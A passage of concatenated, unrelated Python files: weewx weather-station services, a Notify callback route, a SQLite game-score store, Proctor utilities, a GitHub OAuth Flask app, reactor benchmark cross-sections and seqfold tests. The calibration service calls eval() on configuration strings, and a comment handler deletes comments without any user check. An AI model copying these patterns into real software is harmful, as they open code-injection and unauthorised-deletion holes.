'StdCalibrate', 'eval')
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
except KeyError:
log.info("No calibration information in config file. Ignored.")
def new_loop_packet(self, event):
"""Apply a calibration correction to a LOOP packet"""
for obs_type in self.corrections:
if obs_type == 'foo': continue
try:
event.packet[obs_type] = eval(self.corrections[obs_type], None, event.packet)
except (TypeError, NameError):
pass
except ValueError as e:
log.error("StdCalibration loop error %s", e)
def new_archive_record(self, event):
"""Apply a calibration correction to an archive packet"""
# If the record was software generated, then any corrections have
# already been applied in the LOOP packet.
if event.origin != 'software':
for obs_type in self.corrections:
if obs_type == 'foo': continue
try:
event.record[obs_type] = eval(self.corrections[obs_type], None, event.record)
except (TypeError, NameError):
pass
except ValueError as e:
log.error("StdCalibration archive error %s", e)
#==============================================================================
# Class StdQC
#==============================================================================
class StdQC(StdService):
"""Service that performs quality check on incoming data.
A StdService wrapper for a QC object so it may be called as a service. This
also allows the weewx.qc.QC class to be used elsewhere without the
overheads of running it as a weewx service.
"""
def __init__(self, engine, config_dict):
super(StdQC, self).__init__(engine, config_dict)
# Get a QC object to apply the QC checks to our data
self.qc = weewx.qc.QC(config_dict)
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
def new_loop_packet(self, event):
"""Apply quality check to the data in a loop packet"""
self.qc.apply_qc(event.packet, 'LOOP')
def new_archive_record(self, event):
"""Apply quality check to the data in an archive record"""
self.qc.apply_qc(event.record, 'Archive')
#==============================================================================
# Class StdArchive
#==============================================================================
class StdArchive(StdService):
"""Service that archives LOOP and archive data in the SQL databases."""
# This service manages an "accumulator", which records high/lows and
# averages of LOOP packets over an archive period. At the end of the
# archive period it then emits an archive record.
def __init__(self, engine, config_dict):
super(StdArchive, self).__init__(engine, config_dict)
# Extract the various options from the config file. If it's missing, fill in with defaults:
if 'StdArchive' in config_dict:
self.data_binding = config_dict['StdArchive'].get('data_binding', 'wx_binding')
self.record_generation = config_dict['StdArchive'].get('record_generation', 'hardware').lower()
self.no_catchup = to_bool(config_dict['StdArchive'].get('no_catchup', False))
self.archive_delay = to_int(config_dict['StdArchive'].get('archive_delay', 15))
software_interval = to_int(config_dict['StdArchive'].get('archive_interval', 300))
self.loop_hilo = to_bool(config_dict['StdArchive'].get('loop_hilo', True))
self.record_augmentation = to_bool(config_dict['StdArchive'].get('record_augmentation', True))
else:
self.data_binding = 'wx_binding'
self.record_generation = 'hardware'
self.archive_delay = 15
software_interval = 300
self.loop_hilo = True
self.record_augmentation = True
log.info("Archive will use data binding %s", self.data_binding)
log.info("Record generation will be attempted in '%s'", self.record_generation)
if self.record_generation == 'software':
self.archive_interval = software_interval
ival_msg = "(software record generation)"
elif self.record_generation == 'hardware':
# If the station supports a hardware archive interval, use that.
# Warn if it is different than what is in config.
try:
if software_interval != self.engine.console.archive_interval:
log.error("The archive interval in the"
" configuration file (%d) does not match the"
" station hardware interval (%d).",
software_interval,
self.engine.console.archive_interval)
self.archive_interval = self.engine.console.archive_interval
ival_msg = "(specified by hardware)"
except NotImplementedError:
self.archive_interval = software_interval
ival_msg = "(specified in weewx configuration)"
else:
log.error("Unknown type of record generation: %s", self.record_generation)
raise ValueError(self.record_generation)
log.info("Using archive interval of %d seconds %s", self.archive_interval, ival_msg)
if self.archive_delay <= 0:
raise weewx.ViolatedPrecondition("Archive delay (%.1f) must be greater than zero." %
(self.archive_delay,))
if self.archive_delay >= self.archive_interval / 2:
log.warning("Archive delay (%d) is unusually long", self.archive_delay)
log.debug("Use LOOP data in hi/low calculations: %d", self.loop_hilo)
weewx.accum.initialize(config_dict)
self.old_accumulator = None
self.bind(weewx.STARTUP, self.startup)
self.bind(weewx.PRE_LOOP, self.pre_loop)
self.bind(weewx.POST_LOOP, self.post_loop)
self.bind(weewx.CHECK_LOOP, self.check_loop)
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
def startup(self, _event):
"""Called when the engine is starting up. Main task is to set up the database, backfill it, then
perform a catch up if the hardware supports it. """
# This will create the database if it doesn't exist:
dbmanager = self.engine.db_binder.get_manager(self.data_binding, initialize=True)
log.info("Using binding '%s' to database '%s'", self.data_binding, dbmanager.database_name)
# Make sure the daily summaries have not been partially updated
if dbmanager._read_metadata('lastWeightPatch'):
raise weewx.ViolatedPrecondition("Update of daily summary for database '%s' not complete. "
"Finish the update first." % dbmanager.database_name)
# Back fill the daily summaries.
_nrecs, _ndays = dbmanager.backfill_day_summary()
# Do a catch up on any data still on the station, but not yet put in the database.
if self.no_catchup:
log.debug("No catchup specified.")
else:
# Not all consoles can do a hardware catchup, so be prepared to catch the exception:
try:
self._catchup(self.engine.console.genStartupRecords)
except NotImplementedError:
pass
def pre_loop(self, _event):
"""Called before the main packet loop is entered."""
# If this the the initial time through the loop, then the end of
# the archive and delay periods need to be primed:
if not hasattr(self, 'end_archive_period_ts'):
now = self.engine._get_console_time()
start_archive_period_ts = weeutil.weeutil.startOfInterval(now, self.archive_interval)
self.end_archive_period_ts = start_archive_period_ts + self.archive_interval
self.end_archive_delay_ts = self.end_archive_period_ts + self.archive_delay
self.old_accumulator = None
def new_loop_packet(self, event):
"""Called when A new LOOP record has arrived."""
# Do we have an accumulator at all? If not, create one:
if not hasattr(self, "accumulator"):
self.accumulator = self._new_accumulator(event.packet['dateTime'])
# Try adding the LOOP packet to the existing accumulator. If the
# timestamp is outside the timespan of the accumulator, an exception
# will be thrown:
try:
self.accumulator.addRecord(event.packet, add_hilo=self.loop_hilo)
except weewx.accum.OutOfSpan:
# Shuffle accumulators:
(self.old_accumulator, self.accumulator) = (self.accumulator, self._new_accumulator(event.packet['dateTime']))
# Try again:
self.accumulator.addRecord(event.packet, add_hilo=self.loop_hilo)
def check_loop(self, event):
"""Called after any loop packets have been processed. This is the opportunity
to break the main loop by throwing an exception."""
# Is this the end of the archive period? If so, dispatch an
# END_ARCHIVE_PERIOD event
if event.packet['dateTime'] > self.end_archive_period_ts:
self.engine.dispatchEvent(weewx.Event(weewx.END_ARCHIVE_PERIOD, packet=event.packet))
start_archive_period_ts = weeutil.weeutil.startOfInterval(event.packet['dateTime'], self.archive_interval)
self.end_archive_period_ts = start_archive_period_ts + self.archive_interval
# Has the end of the archive delay period ended? If so, break the loop.
if event.packet['dateTime'] >= self.end_archive_delay_ts:
raise BreakLoop
def post_loop(self, _event):
"""The main packet loop has ended, so process the old accumulator."""
# If weewx happens to startup in the small time interval between the end of
# the archive interval and the end of the archive delay period, then
# there will be no old accumulator. Check for this.
if self.old_accumulator:
# If the user has requested software generation, then do that:
if self.record_generation == 'software':
self._software_catchup()
elif self.record_generation == 'hardware':
# Otherwise, try to honor hardware generation. An exception
# will be raised if the console does not support it. In that
# case, fall back to software generation.
try:
self._catchup(self.engine.console.genArchiveRecords)
except NotImplementedError:
self._software_catchup()
else:
raise ValueError("Unknown station record generation value %s" % self.record_generation)
self.old_accumulator = None
# Set the time of the next break loop:
self.end_archive_delay_ts = self.end_archive_period_ts + self.archive_delay
def new_archive_record(self, event):
"""Called when a new archive record has arrived.
Put it in the archive database."""
# If requested, extract any extra information we can out of the
# accumulator and put it in the record.
if self.record_augmentation and self.old_accumulator \
and event.record['dateTime'] == self.old_accumulator.timespan.stop:
self.old_accumulator.augmentRecord(event.record)
dbmanager = self.engine.db_binder.get_manager(self.data_binding)
dbmanager.addRecord(event.record, accumulator=self.old_accumulator)
def _catchup(self, generator):
"""Pull any unarchived records off the console and archive them.
If the hardware does not support hardware archives, an exception of
type NotImplementedError will be thrown."""
dbmanager = self.engine.db_binder.get_manager(self.data_binding)
# Find out when the database was last updated.
lastgood_ts = dbmanager.lastGoodStamp()
try:
# Now ask the console for any new records since then. Not all
# consoles support this feature. Note that for some consoles,
# notably the Vantage, when doing a long catchup the archive
# records may not be on the same boundaries as the archive
# interval. Reject any records that have a timestamp in the
# future, but provide some lenience for clock drift.
for record in generator(lastgood_ts):
ts = record.get('dateTime')
if ts and ts < time.time() + self.archive_delay:
self.engine.dispatchEvent(weewx.Event(weewx.NEW_ARCHIVE_RECORD,
record=record,
origin='hardware'))
else:
log.warning("ignore historical record: %s" % record)
except weewx.HardwareError as e:
log.error("Internal error detected. Catchup abandoned")
log.error("**** %s" % e)
def _software_catchup(self):
# Extract a record out of the old accumulator.
record = self.old_accumulator.getRecord()
# Add the archive interval
record['interval'] = self.archive_interval / 60
# Send out an event with the new record:
self.engine.dispatchEvent(weewx.Event(weewx.NEW_ARCHIVE_RECORD, record=record, origin='software'))
def _new_accumulator(self, timestamp):
start_ts = weeutil.weeutil.startOfInterval(timestamp,
self.archive_interval)
end_ts = start_ts + self.archive_interval
# Instantiate a new accumulator
new_accumulator = weewx.accum.Accum(weeutil.weeutil.TimeSpan(start_ts, end_ts))
return new_accumulator
#==============================================================================
# Class StdTimeSynch
#==============================================================================
class StdTimeSynch(StdService):
"""Regularly asks the station to synch up its clock."""
def __init__(self, engine, config_dict):
super(StdTimeSynch, self).__init__(engine, config_dict)
# Zero out the time of last synch, and get the time between synchs.
self.last_synch_ts = 0
self.clock_check = int(config_dict.get('StdTimeSynch', {'clock_check': 14400}).get('clock_check', 14400))
self.max_drift = int(config_dict.get('StdTimeSynch', {'max_drift': 5}).get('max_drift', 5))
self.bind(weewx.STARTUP, self.startup)
self.bind(weewx.PRE_LOOP, self.pre_loop)
def startup(self, _event):
"""Called when the engine is starting up."""
self.do_sync()
def pre_loop(self, _event):
"""Called before the main event loop is started."""
self.do_sync()
def do_sync(self):
"""Ask the station to synch up if enough time has passed."""
# Synch up the station's clock if it's been more than clock_check
# seconds since the last check:
now_ts = time.time()
if now_ts - self.last_synch_ts >= self.clock_check:
self.last_synch_ts = now_ts
try:
console_time = self.engine.console.getTime()
if console_time is None:
return
# getTime can take a long time to run, so we use the current
# system time
diff = console_time - time.time()
log.info("Clock error is %.2f seconds (positive is fast)", diff)
if abs(diff) > self.max_drift:
try:
self.engine.console.setTime()
except NotImplementedError:
log.debug("Station does not support setting the time")
except NotImplementedError:
log.debug("Station does not support reading the time")
except weewx.WeeWxIOError as e:
log.info("Error reading time: %s" % e)
#==============================================================================
# Class StdPrint
#==============================================================================
class StdPrint(StdService):
"""Service that prints diagnostic information when a LOOP
or archive packet is received."""
def __init__(self, engine, config_dict):
super(StdPrint, self).__init__(engine, config_dict)
self.bind(weewx.NEW_LOOP_PACKET, self.new_loop_packet)
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
def new_loop_packet(self, event):
"""Print out the new LOOP packet"""
print("LOOP: ",
weeutil.weeutil.timestamp_to_string(event.packet['dateTime']),
to_sorted_string(event.packet))
def new_archive_record(self, event):
"""Print out the new archive record."""
print("REC: ",
weeutil.weeutil.timestamp_to_string(event.record['dateTime']),
to_sorted_string(event.record))
#==============================================================================
# Class StdReport
#==============================================================================
class StdReport(StdService):
"""Launches a separate thread to do reporting."""
def __init__(self, engine, config_dict):
super(StdReport, self).__init__(engine, config_dict)
self.max_wait = int(config_dict['StdReport'].get('max_wait', 600))
self.thread = None
self.launch_time = None
self.record = None
self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)
self.bind(weewx.POST_LOOP, self.launch_report_thread)
def new_archive_record(self, event):
"""Cache the archive record to pass to the report thread."""
self.record = event.record
def launch_report_thread(self, _event):
"""Called after the packet LOOP. Processes any new data."""
import weewx.reportengine
# Do not launch the reporting thread if an old one is still alive.
# To guard against a zombie thread (alive, but doing nothing) launch
# anyway if enough time has passed.
if self.thread and self.thread.isAlive():
thread_age = time.time() - self.launch_time
if thread_age < self.max_wait:
log.info("Launch of report thread aborted: existing report thread still running")
return
else:
log.warning("Previous report thread has been running"
" %s seconds. Launching report thread anyway.", thread_age)
try:
self.thread = weewx.reportengine.StdReportEngine(self.config_dict,
self.engine.stn_info,
self.record,
first_run=not self.launch_time)
self.thread.start()
self.launch_time = time.time()
except threading.ThreadError:
log.error("Unable to launch report thread.")
self.thread = None
def shutDown(self):
if self.thread:
log.info("Shutting down StdReport thread")
self.thread.join(20.0)
if self.thread.isAlive():
log.error("Unable to shut down StdReport thread")
else:
log.debug("StdReport thread has been terminated")
self.thread = None
self.launch_time = None
|
from flask import jsonify, current_app
from dmapiclient.audit import AuditTypes
from dmutils.email.helpers import hash_string
from app import db
from app.callbacks import callbacks
from app.utils import get_json_from_request
from app.models import User, AuditEvent
@callbacks.route('/')
@callbacks.route('')
def callbacks_root():
return jsonify(status='ok'), 200
@callbacks.route('/notify', methods=['POST'])
def notify_callback():
notify_data = get_json_from_request()
email_address = notify_data["to"]
hashed_email = hash_string(email_address)
reference = notify_data["reference"]
status = notify_data["status"]
# remove PII from response for logging
# according to docs only "to" has PII
# https://docs.notifications.service.gov.uk/rest-api.html#delivery-receipts
clean_notify_data = notify_data.copy()
del clean_notify_data["to"]
current_app.logger.info(
f"Notify callback: {status}: {reference} to {hashed_email}",
extra={"notify_delivery_receipt": clean_notify_data},
)
if status == "permanent-failure":
user = User.query.filter(
User.email_address == email_address
).first()
if user and user.active:
user.active = False
db.session.add(user)
audit_event = AuditEvent(
audit_type=AuditTypes.update_user,
user='Notify callback',
data={"user": {"active": False}, "notify_callback_data": notify_data},
db_object=user,
)
db.session.add(audit_event)
db.session.commit()
current_app.logger.info(
f"User account disabled for {hashed_email} after Notify reported permanent delivery "
"failure."
)
elif status.endswith("failure"):
current_app.logger.warning(
f"Notify failed to deliver {reference} to {hashed_email}"
)
return jsonify(status='ok'), 200
|
'''
Storage helper class
MIT License
Copyright (c) 2019 Daniel Marchasin (daniel@vt77.com)
See LICENSE file
'''
import os.path
import sqlite3
import logging
logger = logging.getLogger(__name__)
dbfilename = 'data/.gamedata.db'
if not os.path.isfile(dbfilename):
with sqlite3.connect(dbfilename) as conn:
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,socialid varchar(128), name varchar(128),email varchar(128), image varchar(128),score_h integer,score_ai integer)")
conn.execute("CREATE UNIQUE INDEX index_socialid ON users(socialid)")
conn.execute("CREATE INDEX index_score ON users(score_h)")
def update_user_score(id,wins,loses):
with sqlite3.connect(dbfilename) as conn:
conn.execute("UPDATE users SET score_h=?,score_ai=? WHERE id=?",(wins,loses,id))
def update_games_count(id,count):
with sqlite3.connect(dbfilename) as conn:
conn.execute("UPDATE users SET games_count=? where id=?",(count,id))
return count
def create_user(socialid,user_data):
user_id = None
with sqlite3.connect(dbfilename) as conn:
cur = conn.execute("INSERT INTO users (socialid,name,email,image,score_h,score_ai) VALUES (?,?,?,?,0,0)", (socialid,user_data['name'],user_data['email'],user_data['image']))
user_id = cur.lastrowid
return user_id
def get_user_id(social_id):
logger.info("Getting user by SocialID %s" % social_id )
with sqlite3.connect(dbfilename) as conn:
cur = conn.execute("SELECT id,email FROM users WHERE socialid=?",[social_id])
if not cur:
logger.info("[STORAGE]User not found. ID: %s" % social_id)
return None
row = cur.fetchone()
if row is None:
return None
logger.info("[STORAGE]Found user : : %s ", row[1])
return row[0]
def get_top_scores(num):
with sqlite3.connect(dbfilename) as conn:
cur = conn.execute("SELECT name,image,score_h,score_ai FROM users order by score_h desc limit 10")
best_scores = [dict(zip(['name','image','score_h','score_ai'],list(s))) for s in cur]
return best_scores
if __name__ == '__main__':
import sys,os
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.addHandler( logging.StreamHandler(sys.stdout) )
print(get_top_scores(10))
|
"""
Module that provides access to the Proctor registry
or conditions.
The utility functions here could conceivably be wrapped
and exposed via a web endpoint.
All output from these utils should be json format.
"""
import logging
import serializers
from filter_set import FilterSet
from . import Proctor, ContextualCondition
log = logging.getLogger("proctor.utils")
def list_conditions():
"""List all the conditions"""
_proctor = Proctor()
return map(serializers.registered_condition, _proctor._conditions._registry.values())
def search_conditions(filters, klass=None):
"""
Search the condition registry
filters: FilterSet spec
klass: Class to prefilter results - will observe inheritence
"""
_proctor = Proctor()
condition_list = []
filter_set = FilterSet(filters)
# Get a dict of conditions
if klass:
conditions = _proctor._conditions.get_registered_conditions(klass)
else:
conditions = _proctor._conditions._registry.values()
condition_list = map(serializers.registered_condition, conditions)
return filter(filter_set.filter, condition_list)
def get_context_condition(condition_id, obj):
"""Get a condition with a context loaded"""
_proctor = Proctor()
condition = _proctor._conditions.get_condition(condition_id)
if not condition:
raise Exception("Conditions does not exist {}".format(condition_id))
return serializers.context_condition(ContextualCondition(obj, condition))
def check_condition(condition_id, obj):
"""Get the result of checking a condition on an object"""
_proctor = Proctor()
condition = _proctor._conditions.get_condition(condition_id)
if not condition:
raise Exception("Conditions does not exist {}".format(condition_id))
cond = ContextualCondition(obj, condition)
cond.detect()
return serializers.context_condition(cond)
def fix_condition(condition_id, obj):
"""Get the result of fixing a condition on an object"""
_proctor = Proctor()
condition = _proctor._conditions.get_condition(condition_id)
if not condition:
raise Exception("Conditions does not exist {}".format(condition_id))
cond = ContextualCondition(obj, condition)
cond.detect()
if cond.detected:
cond.rectify()
return serializers.context_condition(cond)
def get_context_conditions(obj, condition_filters=None):
"""
Get all conditions for an object
See search_conditions.
"""
_proctor = Proctor()
_filters = condition_filters or {}
# Get the contextual conditions
conditions = map(
lambda x: ContextualCondition(obj, _proctor._conditions.get_condition(x.pid)),
search_conditions(_filters, obj.__class__)
)
# serialize it
return map(serializers.context_condition, conditions)
def check_conditions(obj, condition_filters=None):
"""
Get the results of checking all conditions on an object
Checks only the conditions that match the condition_filters.
See search_conditions.
"""
_proctor = Proctor()
_filters = condition_filters or {}
# Get the contextual conditions
conditions = map(
lambda x: ContextualCondition(obj, _proctor._conditions.get_condition(x.pid)),
search_conditions(_filters, obj.__class__)
)
# Now go run the detector on all the conditions
for cond in conditions:
cond.detect()
# serialize it
return map(serializers.context_condition, conditions)
def fix_conditions(obj, condition_filters=None):
"""
Get the results of fixing all detected conditions on an object
Checks only the conditions that match the condition_filters.
See search_conditions.
"""
_proctor = Proctor()
_filters = condition_filters or {}
# Get the contextual conditions
conditions = map(
lambda x: ContextualCondition(obj, _proctor._conditions.get_condition(x.pid)),
search_conditions(_filters, obj.__class__)
)
# Now go run the detector on all the conditions
for cond in conditions:
cond.detect()
if cond.detected:
cond.rectify()
# serialize it
return map(serializers.context_condition, conditions)
|
class Base():
def __init__(self, filename, byte_content, entries, option_map):
raise 'Not implemented!'
def parse(self):
pass
|
import tensorflow as tf
from tensorflow import keras
ops_module = tf.load_op_library('ops/ops.so')
class BinarizeLayer(keras.layers.Layer):
"""Binarize input probabilities via graph-cut algorithm."""
def __init__(self, gc_lambda, name=None):
super().__init__(trainable=False, name=name)
assert gc_lambda >= 0
self.gc_lambda = gc_lambda
def call(self, probs):
result = ops_module.gc_binarize(probs[0], self.gc_lambda)
return tf.expand_dims(result, axis=0)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from quixote.errors import TraversalError
from vilya.models.project import CodeDoubanProject
from vilya.models.comment import Comment, latest
from vilya.views.util import http_method
_q_exports = []
class CommentUI:
''' project commit comment ui '''
_q_exports = ['new']
def __init__(self, proj_name):
self.proj_name = proj_name
def _q_index(self, request):
return "Last comments list TODO" + str(latest())
@http_method(methods=['POST'])
def new(self, request):
project = CodeDoubanProject.get_by_name(self.proj_name)
user = request.user
ref = request.get_form_var('ref')
assert ref, "comment ref cannot be empty"
content = request.get_form_var('content', '')
new_comment = Comment.add(project, ref, user.name, content)
return request.redirect("/%s/commit/%s#%s" %
(self.proj_name, ref, new_comment.uid))
def _q_lookup(self, request, comment_id):
if request.method == 'DELETE':
# FIXME: 不用验证user?
ok = Comment.delete(comment_id)
if not ok:
raise TraversalError(
"Unable to delete comment %s" % comment_id)
return ''
return "Display comment %s TODO" % comment_id
|
import cv2
class Rescale(object):
"""Rescale the image in a sample to a given size.
Args:
output_size (tuple or int): Desired output size. If tuple, output is
matched to output_size. If int, smaller of image edges is matched
to output_size keeping aspect ratio the same.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
self.output_size = output_size
def __call__(self, sample):
image, key_pts = sample['image'], sample['keypoints']
h, w = image.shape[:2]
if isinstance(self.output_size, int):
if h > w:
new_h, new_w = self.output_size * h / w, self.output_size
else:
new_h, new_w = self.output_size, self.output_size * w / h
else:
new_h, new_w = self.output_size
new_h, new_w = int(new_h), int(new_w)
img = cv2.resize(image, (new_w, new_h))
# scale the pts, too
key_pts = key_pts * [new_w / w, new_h / h]
return {'image': img, 'keypoints': key_pts}
|
try:
from flask import Flask, render_template, url_for, request, redirect, make_response
import random
import json
import os
from time import time
from random import random
from flask import Flask, render_template, make_response
from flask_dance.contrib.github import make_github_blueprint, github
from getGithubData import Github
from constable import Constable
from badge import Badge
except Exception as e:
print("Some Modules are Missing {}".format(e))
app = Flask(__name__)
app.config["SECRET_KEY"] = os.environ['secret_key']
github_blueprint = make_github_blueprint(client_id=os.environ['client_id'],
client_secret=os.environ['client_secret'])
app.register_blueprint(github_blueprint, url_prefix='/github_login')
@app.route('/')
def github_login():
if not github.authorized:
return redirect(url_for('github.login'))
else:
account_info = github.get('/user')
if account_info.ok:
account_data = account_info.json()
user = account_data['login']
return render_template('index.html', title='Welcome', user=user)
return '<h1>Request failed!</h1>'
@app.route('/get_score')
def get_score():
repo_name = request.args.get('repo')
account_info = github.get('/user')
account_data = account_info.json()
owner = account_data['login']
github_gql = Github(github.access_token)
constable = Constable(repo_name, owner, github_gql)
score = constable.get_score()
print(score)
grade = constable.get_grade(score['total_score'])
branch = 'master'
key = '{}/{}/{}'.format(owner, repo_name, branch)
badge = Badge(key).get_shield_url(grade=grade)
return {"score": score, "grade": grade, "badge": badge}
@app.route('/check_repo')
def check_valid_repo():
repo_name = request.args.get('repo')
if github.authorized:
github_gql = Github(github.access_token)
valid = github_gql.check_valid_repo(repo_name)
else:
valid = False
return {"valid": valid}
|
"""
This file writes all of the materials data (multi-group nuclear
cross-sections) for the LRA diffusion
benchmark problem to an HDF5 file. The script uses the h5py Python package
to interact with the HDF5 file format. This may be a good example for those
wishing ot write their nuclear data to an HDF5 file to import using the
OpenMOC 'materialize' Python module.
"""
# Create a Python dictionary to store LRA multi-group cross-sections
dataset = {}
dataset['Energy Groups'] = 2
dataset['Delayed Groups'] = 2
dataset['Materials'] = {}
lra_materials = dataset['Materials']
###############################################################################
################################ region 1 ################################
###############################################################################
# Create a subdictionary for region 1 material data
lra_materials['region_1'] = {}
lra_materials['region_1']['Absorption XS'] = [0.008252, 0.1003]
lra_materials['region_1']['Total XS'] = [0.2656, 1.5798]
lra_materials['region_1']['Scattering XS'] = [0.231892, 0.02533, 0.00, 1.47948]
lra_materials['region_1']['Fission XS'] = [0.002, 0.05]
lra_materials['region_1']['Nu Fission XS'] = [0.004602, 0.1091]
lra_materials['region_1']['Chi'] = [1.0, 0.0]
lra_materials['region_1']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_1']['Velocity'] = [3e7, 3e5]
lra_materials['region_1']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 2 ################################
###############################################################################
# Create a subdictionary for region 2 material data
lra_materials['region_2'] = {}
lra_materials['region_2']['Absorption XS'] = [0.007181, 0.07047]
lra_materials['region_2']['Total XS'] = [0.2629, 1.7525]
lra_materials['region_2']['Scattering XS'] = [0.22792, 0.02767, 0.00, 1.68201]
lra_materials['region_2']['Fission XS'] = [0.002, 0.045]
lra_materials['region_2']['Nu Fission XS'] = [0.004609, 0.08675]
lra_materials['region_2']['Chi'] = [1.0, 0.0]
lra_materials['region_2']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_2']['Velocity'] = [3e7, 3e5]
lra_materials['region_2']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 3 ################################
###############################################################################
# Create a subdictionary for region 3 material data
lra_materials['region_3'] = {}
lra_materials['region_3']['Absorption XS'] = [0.008002, 0.08344]
lra_materials['region_3']['Total XS'] = [0.2648, 1.5941]
lra_materials['region_3']['Scattering XS'] = [0.230502, 0.02617, 0.00, 1.510639]
lra_materials['region_3']['Fission XS'] = [0.002, 0.045]
lra_materials['region_3']['Nu Fission XS'] = [0.004663, 0.1021]
lra_materials['region_3']['Chi'] = [1.0, 0.0]
lra_materials['region_3']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_3']['Velocity'] = [3e7, 3e5]
lra_materials['region_3']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 4 ################################
###############################################################################
# Create a subdictionary for region 4 material data
lra_materials['region_4'] = {}
lra_materials['region_4']['Absorption XS'] = [0.008002, 0.073324]
lra_materials['region_4']['Total XS'] = [0.2648, 1.5941]
lra_materials['region_4']['Scattering XS'] = [0.230462, 0.02617, 0.00, 1.520789]
lra_materials['region_4']['Fission XS'] = [0.002, 0.045]
lra_materials['region_4']['Nu Fission XS'] = [0.004663, 0.1021]
lra_materials['region_4']['Chi'] = [1.0, 0.0]
lra_materials['region_4']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_4']['Velocity'] = [3e7, 3e5]
lra_materials['region_4']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 5 ################################
###############################################################################
# Create a subdictionary for region 5 material data
lra_materials['region_5'] = {}
lra_materials['region_5']['Absorption XS'] = [0.008002, 0.08344]
lra_materials['region_5']['Total XS'] = [0.2648, 1.5941]
lra_materials['region_5']['Scattering XS'] = [0.230462, 0.02617, 0.00, 1.510672]
lra_materials['region_5']['Fission XS'] = [0.002, 0.045]
lra_materials['region_5']['Nu Fission XS'] = [0.004663, 0.1021]
lra_materials['region_5']['Chi'] = [1.0, 0.0]
lra_materials['region_5']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_5']['Velocity'] = [3e7, 3e5]
lra_materials['region_5']['Delayed Fraction'] = [0.0054, 0.001087]
###############################################################################
################################ region 6 ################################
###############################################################################
# Create a subdictionary for region 6 material data
lra_materials['region_6'] = {}
lra_materials['region_6']['Absorption XS'] = [0.0006034, 0.01911]
lra_materials['region_6']['Total XS'] = [0.2652, 2.0938]
lra_materials['region_6']['Scattering XS'] = [0.216931, 0.04754, 0.00, 2.074676]
lra_materials['region_6']['Fission XS'] = [0.0, 0.0]
lra_materials['region_6']['Nu Fission XS'] = [0.0, 0.0]
lra_materials['region_6']['Chi'] = [1.0, 0.0]
lra_materials['region_6']['Decay Constant'] = [0.00654, 1.35]
lra_materials['region_6']['Velocity'] = [3e7, 3e5]
lra_materials['region_6']['Delayed Fraction'] = [0.0054, 0.001087]
|
"""Test DNA/RNA folding."""
from os import path
from time import time
import unittest
from seqfold import dg, dg_cache, fold, Cache, Struct
from seqfold.dna import DNA_ENERGIES
from seqfold.rna import RNA_ENERGIES
from seqfold.fold import (
STRUCT_DEFAULT,
_traceback,
_bulge,
_stack,
_hairpin,
_internal_loop,
_pair,
_w,
Structs,
)
class TestFold(unittest.TestCase):
"""Test folding functions"""
def test_fold(self):
"""Fold function."""
# it should throw if a nonsense sequence is provided
with self.assertRaises(RuntimeError):
dg("EASFEASFAST", 37.0)
# Both U and T, mix of RNA and DNA
with self.assertRaises(RuntimeError):
dg("ATGCATGACGATUU", 37.0)
# should not throw
dg("ATGGATTTAGATAGAT")
def test_fold_cache(self):
"""Gather a cache of the folded structure."""
seq = "ATGGATTTAGATAGAT"
cache = dg_cache(seq)
seq_dg = dg(seq)
self.assertAlmostEqual(seq_dg, cache[0][len(seq) - 1], delta=1)
def test_fold_dna(self):
"""DNA folding to find min energy secondary structure."""
# unafold's estimates for free energy estimates of DNA oligos
unafold_dgs = {
"GGGAGGTCGTTACATCTGGGTAACACCGGTACTGATCCGGTGACCTCCC": -10.94, # three branched structure
"GGGAGGTCGCTCCAGCTGGGAGGAGCGTTGGGGGTATATACCCCCAACACCGGTACTGATCCGGTGACCTCCC": -23.4, # four branched structure
"CGCAGGGAUACCCGCG": -3.8,
"TAGCTCAGCTGGGAGAGCGCCTGCTTTGCACGCAGGAGGT": -6.85,
"GGGGGCATAGCTCAGCTGGGAGAGCGCCTGCTTTGCACGCAGGAGGTCTGCGGTTCGATCCCGCGCGCTCCCACCA": -15.50,
"TGAGACGGAAGGGGATGATTGTCCCCTTCCGTCTCA": -18.10,
"ACCCCCTCCTTCCTTGGATCAAGGGGCTCAA": -3.65,
}
for seq, ufold in unafold_dgs.items():
d = dg(seq, temp=37.0)
# accepting a 60% difference
delta = abs(0.6 * min(d, ufold))
self.assertAlmostEqual(d, ufold, delta=delta)
def test_fold_rna(self):
"""RNA folding to find min energy secondary structure."""
# unafold's estimates for free energy estimates of RNA oligos
# most tests available at https://github.com/jaswindersingh2/SPOT-RNA/blob/master/sample_inputs/batch_seq.fasta
unafold_dgs = {
"ACCCCCUCCUUCCUUGGAUCAAGGGGCUCAA": -9.5,
"AAGGGGUUGGUCGCCUCGACUAAGCGGCUUGGAAUUCC": -10.1,
"UUGGAGUACACAACCUGUACACUCUUUC": -4.3,
"AGGGAAAAUCCC": -3.3,
"GCUUACGAGCAAGUUAAGCAAC": -4.6,
"UGGGAGGUCGUCUAACGGUAGGACGGCGGACUCUGGAUCCGCUGGUGGAGGUUCGAGUCCUCCCCUCCCAGCCA": -32.8,
"GGGCGAUGAGGCCCGCCCAAACUGCCCUGAAAAGGGCUGAUGGCCUCUACUG": -20.7,
"GGGGGCAUAGCUCAGCUGGGAGAGCGCCUGCUUUGCACGCAGGAGGUCUGCGGUUCGAUCCCGCGCGCUCCCACCA": -31.4,
}
for seq, ufold in unafold_dgs.items():
d = dg(seq, temp=37.0)
# accepting a 5% difference
delta = abs(0.5 * min(d, ufold))
